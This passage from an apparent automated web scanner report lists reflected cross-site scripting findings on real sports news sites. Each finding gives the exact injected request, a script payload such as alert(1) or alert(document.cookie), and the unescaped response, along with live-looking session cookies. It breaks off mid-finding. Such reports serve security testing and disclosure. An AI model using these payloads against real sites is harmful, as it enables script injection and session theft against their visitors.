...[SNIP]...

2.213. http://www.csnbaltimore.com/pages/video [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /pages/video

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e981e<script>alert(1)</script>cbb3f841745 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagese981e<script>alert(1)</script>cbb3f841745/video HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:12 GMT
Content-Length: 769
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/pagese981e<script>alert(1)</script>cbb3f841745/video"</strong>
...[SNIP]...

2.214. http://www.csnbaltimore.com/pages/video [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /pages/video

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 88f56<script>alert(1)</script>dd0e6f8cead was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /pages/video88f56<script>alert(1)</script>dd0e6f8cead HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:13 GMT
Content-Length: 788
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/404.html?p=/pages/video88f56<script>alert(1)</script>dd0e6f8cead"</strong>
...[SNIP]...

2.215. http://www.csnbaltimore.com/pages/video [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /pages/video

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bd0f"><script>alert(1)</script>b7a862edddf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages/video?9bd0f"><script>alert(1)</script>b7a862edddf=1 HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 55931
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:12 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<!--
web5.platformic.com
-->
<meta http-equiv="Content-Type" content="t
...[SNIP]...
<input type=hidden name="9bd0f"><script>alert(1)</script>b7a862edddf" id = "9bd0f">
...[SNIP]...

2.216. http://www.csnbayarea.com/12/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a36d6"><script>alert(1)</script>4cc38bef644 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12a36d6"><script>alert(1)</script>4cc38bef644/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 35402
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:19 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12a36d6"><script>alert(1)</script>4cc38bef644/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html">
...[SNIP]...

2.217. http://www.csnbayarea.com/12/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c3af"><script>alert(1)</script>280925335e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/173c3af"><script>alert(1)</script>280925335e/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 35401
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:20 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/173c3af"><script>alert(1)</script>280925335e/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html">
...[SNIP]...

2.218. http://www.csnbayarea.com/12/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90b9a"><script>alert(1)</script>5f8cf1335bb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/1090b9a"><script>alert(1)</script>5f8cf1335bb/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 35402
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:21 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/17/1090b9a"><script>alert(1)</script>5f8cf1335bb/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html">
...[SNIP]...

2.219. http://www.csnbayarea.com/12/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed61c"><script>alert(1)</script>1b63bb97bee was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/Gutierrez-Denver-Raiders-matchups-to-wated61c"><script>alert(1)</script>1b63bb97bee/landing_gutierrez.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 35383
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:22 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/17/10/Gutierrez-Denver-Raiders-matchups-to-wated61c"><script>alert(1)</script>1b63bb97bee/landing_gutierrez.html">
...[SNIP]...

2.220. http://www.csnbayarea.com/12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd3d0"><script>alert(1)</script>56354eb4635 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12cd3d0"><script>alert(1)</script>56354eb4635/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 41042
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:21 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12cd3d0"><script>alert(1)</script>56354eb4635/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html">
...[SNIP]...

2.221. http://www.csnbayarea.com/12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46335"><script>alert(1)</script>f110c8b6e2c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/1746335"><script>alert(1)</script>f110c8b6e2c/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 41042
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:22 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/1746335"><script>alert(1)</script>f110c8b6e2c/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html">
...[SNIP]...

2.222. http://www.csnbayarea.com/12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efabd"><script>alert(1)</script>31a0dd08c37 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10efabd"><script>alert(1)</script>31a0dd08c37/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 41042
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:24 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/17/10efabd"><script>alert(1)</script>31a0dd08c37/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html">
...[SNIP]...

2.223. http://www.csnbayarea.com/12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c68e"><script>alert(1)</script>0e5f634afe3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/Maiocco-Singletary-again-weighs-which-Sm3c68e"><script>alert(1)</script>0e5f634afe3/landing_maiocco_v3.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 41023
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:25 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/17/10/Maiocco-Singletary-again-weighs-which-Sm3c68e"><script>alert(1)</script>0e5f634afe3/landing_maiocco_v3.html">
...[SNIP]...

2.224. http://www.csnbayarea.com/12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2b00"><script>alert(1)</script>b3b513ae740 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12a2b00"><script>alert(1)</script>b3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 40245
Content-Type: text/html
Set-Cookie: PHPSESSID=8924002375011fa867e8db486718e42d; path=/
Expires: Sun, 19 Dec 2010 18:12:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:12:09 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12a2b00"><script>alert(1)</script>b3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html">
...[SNIP]...

2.225. http://www.csnbayarea.com/12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5969e"><script>alert(1)</script>618d21952d3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/175969e"><script>alert(1)</script>618d21952d3/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 40245
Content-Type: text/html
Set-Cookie: PHPSESSID=ffa30f218c9c484953facc9813c8bbd1; path=/
Expires: Sun, 19 Dec 2010 18:12:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:12:10 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/175969e"><script>alert(1)</script>618d21952d3/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html">
...[SNIP]...

2.226. http://www.csnbayarea.com/12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be9c1"><script>alert(1)</script>cc49bcb68a2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10be9c1"><script>alert(1)</script>cc49bcb68a2/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 40245
Content-Type: text/html
Set-Cookie: PHPSESSID=5a4f36899cfc183f565f8c3eb2a13d16; path=/
Expires: Sun, 19 Dec 2010 18:12:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:12:11 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/17/10be9c1"><script>alert(1)</script>cc49bcb68a2/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html">
...[SNIP]...

2.227. http://www.csnbayarea.com/12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85ab2"><script>alert(1)</script>c66f7de0b0d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/Urban-Renterias-comments-wrong-in-every-85ab2"><script>alert(1)</script>c66f7de0b0d/landing_urban_v3.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 40245
Content-Type: text/html
Set-Cookie: PHPSESSID=940f044b17dfcf494474c7a627998fb0; path=/
Expires: Sun, 19 Dec 2010 18:12:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:12:12 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/17/10/Urban-Renterias-comments-wrong-in-every-85ab2"><script>alert(1)</script>c66f7de0b0d/landing_urban_v3.html">
...[SNIP]...

2.228. http://www.csnbayarea.com/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ed7d"><script>alert(1)</script>67cb3a41014 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C7ed7d"><script>alert(1)</script>67cb3a41014/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 40314
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:25 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C7ed7d"><script>alert(1)</script>67cb3a41014/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html">
...[SNIP]...

2.229. http://www.csnbayarea.com/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html

Issue detail

